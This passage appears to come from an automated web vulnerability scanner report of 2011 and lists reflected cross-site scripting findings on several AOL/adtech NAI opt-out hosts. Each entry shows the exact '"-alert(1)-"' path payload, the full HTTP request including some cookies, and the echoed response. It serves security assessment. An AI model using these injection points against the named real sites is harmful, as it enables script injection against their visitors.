<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai119b2"-alert(1)-"b52d5d9fc25/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.139. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.adserver.adtechus.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74451"-alert(1)-"fc2592ad76b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai/daa.php74451"-alert(1)-"fc2592ad76b?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:12:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:12:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php74451"-alert(1)-"fc2592ad76b?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.140. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.adserverec.adtechus.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a3fb"-alert(1)-"2568373cb00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai3a3fb"-alert(1)-"2568373cb00/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:09:31 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:09:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai3a3fb"-alert(1)-"2568373cb00/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.141. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.adserverec.adtechus.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b87f"-alert(1)-"fa7dbe78fed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai/daa.php7b87f"-alert(1)-"fa7dbe78fed?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php7b87f"-alert(1)-"fa7dbe78fed?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.142. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.adserverwc.adtechus.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 418f5"-alert(1)-"f7db6642350 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai418f5"-alert(1)-"f7db6642350/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai418f5"-alert(1)-"f7db6642350/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.143. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.adserverwc.adtechus.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69437"-alert(1)-"1ec89bcc759 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai/daa.php69437"-alert(1)-"1ec89bcc759?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php69437"-alert(1)-"1ec89bcc759?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.144. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.adsonar.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecff2"-alert(1)-"1571936b29c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /naiecff2"-alert(1)-"1571936b29c/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naiecff2"-alert(1)-"1571936b29c/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.145. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.adsonar.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e7c5"-alert(1)-"f5b54d909b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai/daa.php5e7c5"-alert(1)-"f5b54d909b4?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php5e7c5"-alert(1)-"f5b54d909b4?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.146. http://nai.adtech.de/nai/daa.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.adtech.de
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c2ca"-alert(1)-"ee03acab181 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai7c2ca"-alert(1)-"ee03acab181/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC156E651A4418BD90FFF0106094

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai7c2ca"-alert(1)-"ee03acab181/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.147. http://nai.adtech.de/nai/daa.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.adtech.de
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e921f"-alert(1)-"33d594c5b01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai/daa.phpe921f"-alert(1)-"33d594c5b01?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC156E651A4418BD90FFF0106094

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:12:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:12:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpe921f"-alert(1)-"33d594c5b01?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.148. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.glb.adtechus.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38214"-alert(1)-"f12feb46ba8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai38214"-alert(1)-"f12feb46ba8/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai38214"-alert(1)-"f12feb46ba8/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.149. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.glb.adtechus.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6836"-alert(1)-"6f73bec262 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai/daa.phpd6836"-alert(1)-"6f73bec262?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:28 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpd6836"-alert(1)-"6f73bec262?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.150. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.tacoda.at.atwola.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50d49"-alert(1)-"3ed32da4bcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai50d49"-alert(1)-"3ed32da4bcd/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eadx=x; ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:14:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
